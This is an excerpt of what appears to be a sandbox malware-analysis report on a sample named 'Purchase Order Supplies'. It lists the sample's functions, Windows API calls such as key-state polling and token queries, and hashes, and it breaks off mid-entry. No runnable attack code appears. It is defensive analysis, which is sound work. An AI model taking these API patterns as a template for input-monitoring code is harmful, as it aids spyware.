                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                          • String ID:
                          • API String ID: 1389676194-0
                          • Opcode ID: 9d6544feaf3673fa0c80486ba307e82530f1bff69c35469c08cf2fec1ee855d1
                          • Instruction ID: db1881b22a33ba9bf07619f6b72f0a574edd734174042889b186aaaf6f0798aa
                          • Opcode Fuzzy Hash: 9d6544feaf3673fa0c80486ba307e82530f1bff69c35469c08cf2fec1ee855d1
                          • Instruction Fuzzy Hash: EE412835A00205EFCF11EF64C995AADBBF5FF09310B148099E81AAB362DB35ED11DB60
                          Function 00CAB736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(000000FF), ref: 00CAB749
                          • ScreenToClient.USER32(00000000,000000FF), ref: 00CAB766
                          • GetAsyncKeyState.USER32(00000001), ref: 00CAB78B
                          • GetAsyncKeyState.USER32(00000002), ref: 00CAB799
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          • String ID:
                          • API String ID: 4210589936-0
                          • Opcode ID: fa3265b738c635a36382a0d13cf8fdfbf5a3b5077fd6144c08b4692f00791453
                          • Instruction ID: 5598f19e41cf7a18bbfba4897f476e2d9448c5520a09f3496589a36ea13bd994
                          • Opcode Fuzzy Hash: fa3265b738c635a36382a0d13cf8fdfbf5a3b5077fd6144c08b4692f00791453
                          • Instruction Fuzzy Hash: 5F416E3150421AFFDF159F64C844AEABBB5BB46364F104319F829922D1CB70AE90DFB1
                          Function 00CCC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00CCC156
                          • PostMessageW.USER32(?,00000201,00000001), ref: 00CCC200
                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00CCC208
                          • PostMessageW.USER32(?,00000202,00000000), ref: 00CCC216
                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00CCC21E
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          • String ID:
                          • API String ID: 3382505437-0
                          • Opcode ID: ccaae68d75c2b097a21644ba554cb92ec9f28591bda8ed0c2e170718705b6a7e
                          • Instruction ID: 89a2c67fd57cb4eb32637fad28ad3a78328d691965e174cd70b97f4d56abf607
                          • Opcode Fuzzy Hash: ccaae68d75c2b097a21644ba554cb92ec9f28591bda8ed0c2e170718705b6a7e
                          • Instruction Fuzzy Hash: 6531BF71500219EBDF04CFA9DD8CBDE3BB6AB04315F104218F824E62D1C7B09A54DBA0
                          Function 00CCE9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00CCE9CD
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CCE9EA
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CCEA22
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CCEA48
                          • _wcsstr.LIBCMT ref: 00CCEA52
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                          • String ID:
                          • API String ID: 3902887630-0
                          • Opcode ID: 9f35953cac43b13d4688ccbae70903517f60bc9d51af94c8add8259b29238b93
                          • Instruction ID: 66d69776e03207bbb17f46a7c9c310589e1fd88fea2ee99abc9268d045da42d7
                          • Opcode Fuzzy Hash: 9f35953cac43b13d4688ccbae70903517f60bc9d51af94c8add8259b29238b93
                          • Instruction Fuzzy Hash: 1F21D472604204BEEB159B6ADC49FBF7FADEF46750F10802DF809CA191EE71DD41A260
                          Function 00CCCA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CCCA86
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CCCAB8
                          • __itow.LIBCMT ref: 00CCCAD0
                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CCCAF6
                          • __itow.LIBCMT ref: 00CCCB07
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$__itow$_memmove
                          • String ID:
                          • API String ID: 2983881199-0
                          • Opcode ID: d333a65056fbecd41c5d355a33ffb2884175387045dbbe0d26f2e1123c316851
                          • Instruction ID: 5c0553dc6340584fa3925735e078630626a66f83bad8a60b55907b8c48ab6803
                          • Opcode Fuzzy Hash: d333a65056fbecd41c5d355a33ffb2884175387045dbbe0d26f2e1123c316851
                          • Instruction Fuzzy Hash: E321D872B002087BDF21EAA5DC9BFDE7A69EF59710F004028F919E7181DA70CD4597A0
                          Function 00CE89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • IsWindow.USER32(00000000), ref: 00CE89CE
                          • GetForegroundWindow.USER32 ref: 00CE89E5
                          • GetDC.USER32(00000000), ref: 00CE8A21
                          • GetPixel.GDI32(00000000,?,00000003), ref: 00CE8A2D
                          • ReleaseDC.USER32(00000000,00000003), ref: 00CE8A68
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$ForegroundPixelRelease
                          • String ID:
                          • API String ID: 4156661090-0
                          • Opcode ID: 5c1b94239c88329f6978b8843a54e55f26b4de66bf3f66679b1ba181779be417
                          • Instruction ID: 756ad7448c1f9373cf4179e8299c3f9aa0e79fe36dfe35d265f23dbc4a72768b
                          • Opcode Fuzzy Hash: 5c1b94239c88329f6978b8843a54e55f26b4de66bf3f66679b1ba181779be417
                          • Instruction Fuzzy Hash: 7E218176A00204AFDB00EFA5CC89AAA7BF5EF48301B05C479E94AD7352CF70AD45DB60
                          Function 00CAB58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAB5EB
                          • SelectObject.GDI32(?,00000000), ref: 00CAB5FA
                          • BeginPath.GDI32(?), ref: 00CAB611
                          • SelectObject.GDI32(?,00000000), ref: 00CAB63B
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: e0293253547b5eb329bb8a9a143b802e45a0f16c21932039c6be6c2733d4ebc0
                          • Instruction ID: ef0c513c4db02c3e271605308677a6bc2b154ed1e4226ba7ec3d01fd851fdd80
                          • Opcode Fuzzy Hash: e0293253547b5eb329bb8a9a143b802e45a0f16c21932039c6be6c2733d4ebc0
                          • Instruction Fuzzy Hash: CA217974800306FBDB209F55ED487A97FE9FB0232AF14422AF824D62A1D7709D928B60
                          Function 00CB2E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                          Download Yara Rule
                          APIs
                          • __calloc_crt.LIBCMT ref: 00CB2E81
                          • CreateThread.KERNEL32(?,?,00CB2FB7,00000000,?,?), ref: 00CB2EC5
                          • GetLastError.KERNEL32 ref: 00CB2ECF
                          • _free.LIBCMT ref: 00CB2ED8
                          • __dosmaperr.LIBCMT ref: 00CB2EE3
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                          • String ID:
                          • API String ID: 2664167353-0
                          • Opcode ID: cda73072090814453a5b4edb22e7734f9c6c0d727520cc000f40f0e78feeffab
                          • Instruction ID: c1f0f8bc52f2139e232131d298bedc70086264e96eeffb2e55484dc0bfab594c
                          • Opcode Fuzzy Hash: cda73072090814453a5b4edb22e7734f9c6c0d727520cc000f40f0e78feeffab
                          • Instruction Fuzzy Hash: F211C032104746AFDB20BFA69C42DEB7BA9EF45770F100529FA24D6192EF31C90197A0
                          Function 00CCB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCB903
                          • GetLastError.KERNEL32(?,00CCB3CB,?,?,?), ref: 00CCB90D
                          • GetProcessHeap.KERNEL32(00000008,?,?,00CCB3CB,?,?,?), ref: 00CCB91C
                          • RtlAllocateHeap.NTDLL(00000000,?,00CCB3CB), ref: 00CCB923
                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCB93A
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 883493501-0
                          • Opcode ID: 42138f6ec38de0ba56435b80368676d3b60a2fa0a478f78199824f5f86f0199c
                          • Instruction ID: 299a6960b2869c28e9a1957a5a9908746f3873596354b78b806fab0376568ab4
                          • Opcode Fuzzy Hash: 42138f6ec38de0ba56435b80368676d3b60a2fa0a478f78199824f5f86f0199c
                          • Instruction Fuzzy Hash: FC014671201308BFDB114FA5DC89EAB7BBEEF8A764B104029F955C2260DB758D41DE70
                          Function 00CD8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                          Download Yara Rule
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD8371
                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CD837F
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CD8387
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CD8391
                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD83CD
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: 09eee12915ae05d0e84814cad6cd2a473b5314452ab0a11435a172f644027c08
                          • Instruction ID: 7fd65b22572da7e9ea9398ee1f53b6c5013d2a33e2735073b34091231ff3e4a8
                          • Opcode Fuzzy Hash: 09eee12915ae05d0e84814cad6cd2a473b5314452ab0a11435a172f644027c08
                          • Instruction Fuzzy Hash: 60016935C00719EBCF00AFA5EC48AEEBB79FB08B11F000042E605F2260CF70969987B1
                          Function 00CCA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                          Download Yara Rule
                          APIs
                          • CLSIDFromProgID.COMBASE ref: 00CCA874
                          • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00CCA88F
                          • lstrcmpiW.KERNEL32(?,00000000), ref: 00CCA89D
                          • CoTaskMemFree.COMBASE(00000000), ref: 00CCA8AD
                          • CLSIDFromString.COMBASE(?,?), ref: 00CCA8B9
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: From$Prog$FreeStringTasklstrcmpi
                          • String ID:
                          • API String ID: 3897988419-0
                          • Opcode ID: eba8b7ed57802d9de0ae1da25b079f9c3c0a7dd795a69d195258113691ae327b
                          • Instruction ID: 37eef18e537ff6a259ce91a435da17654c654091deef9db5ffd56be063ebd9f3
                          • Opcode Fuzzy Hash: eba8b7ed57802d9de0ae1da25b079f9c3c0a7dd795a69d195258113691ae327b
                          • Instruction Fuzzy Hash: 27014F76A00318BFDB115F58DC48B9ABBAEEF44755F148028F901D2250DB70DE429BA1
                          Function 00CCB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CCB806
                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CCB810
                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CCB81F
                          • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00CCB826
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CCB83C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          • Opcode ID: 1375fb78cc627fe6b87832cd9494bfcc5e22189eb00c45244bca66f8930f245a
                          • Instruction ID: 85b6287a2a3bc065317ddd8aa1051d6c7dee316e977ccdc00f62f1f541db5712
                          • Opcode Fuzzy Hash: 1375fb78cc627fe6b87832cd9494bfcc5e22189eb00c45244bca66f8930f245a
                          • Instruction Fuzzy Hash: 30F03775200314BFEB215FA5EC99FAB7B6EFF4A754F008029F951C6290CBA09D428A70
                          Function 00CCB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CCB7A5
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CCB7AF
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CCB7BE
                          • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00CCB7C5
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CCB7DB
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          • Opcode ID: 0ee8f824edfe1601c85a8ed3e954d4e0fd3e9e432a0c9be0a35dc5a083545359
                          • Instruction ID: be2a71c066d4550aba30c4909f8966e2202e7f8c10c6e0a0c9dd3609c0d0ccc4
                          • Opcode Fuzzy Hash: 0ee8f824edfe1601c85a8ed3e954d4e0fd3e9e432a0c9be0a35dc5a083545359
                          • Instruction Fuzzy Hash: 6EF03C752403547FEB105FA5EC89FA73BADFF8A755F108019F951C6250DB609D428B70
                          Function 00CCFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00CCFA8F
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CCFAA6
                          • MessageBeep.USER32(00000000), ref: 00CCFABE
                          • KillTimer.USER32(?,0000040A), ref: 00CCFADA
                          • EndDialog.USER32(?,00000001), ref: 00CCFAF4
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: 65944d14a4a10d03c09a828b7b94701d0f7e81be93e0a46dc0825491b2e5dc47
                          • Instruction ID: 45b422bd831d3837937b52bcdac62eccc12bd14debf48ef227ce232f7a92780c
                          • Opcode Fuzzy Hash: 65944d14a4a10d03c09a828b7b94701d0f7e81be93e0a46dc0825491b2e5dc47
                          • Instruction Fuzzy Hash: 20018130900704ABFB259B14DD4EFD6B7BABB00B09F04426DF197A55E0DBF4AA46DA60
                          Function 00CAB517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • EndPath.GDI32(?), ref: 00CAB526
                          • StrokeAndFillPath.GDI32(?,?,00D0F583,00000000,?), ref: 00CAB542
                          • SelectObject.GDI32(?,00000000), ref: 00CAB555
                          • DeleteObject.GDI32 ref: 00CAB568
                          • StrokePath.GDI32(?), ref: 00CAB583
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: fc7caae52e1699ec04199c316b17380d2a6cb11013f83fbda3d6b1a8ff2f2854
                          • Instruction ID: eb566dc999f3a2a505466cf115cf98ceecc0a3df6c8cb0390ba7942bbf643dfe
                          • Opcode Fuzzy Hash: fc7caae52e1699ec04199c316b17380d2a6cb11013f83fbda3d6b1a8ff2f2854
                          • Instruction Fuzzy Hash: 1CF0C934400705BBDB255F65ED0C7943FE6A70232AF148215F8A9C83F1CB348A96DF20
                          Function 00CDFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 00CDFAB2
